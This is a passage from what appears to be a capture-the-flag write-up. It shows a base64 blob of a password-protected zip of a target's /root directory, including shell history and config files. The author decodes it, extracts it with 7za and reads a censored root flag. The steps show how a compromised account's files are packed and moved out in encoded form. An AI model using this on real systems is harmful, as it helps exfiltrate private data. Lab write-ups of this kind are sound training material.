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
We decode the result from base64
back to zip
and unzip it.
# echo "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" | base64 -d > root.zip
# 7za x root.zip
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 3858 bytes (4 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 3858
Enter password (will not be echoed):
Everything is Ok
Folders: 3
Files: 7
Size: 4268
Compressed: 3858
And again, let's read the root
flag!
# ls
root root.zip
# cd root
# ls
root.txt
# cat root.txt
CENSORED_FLAG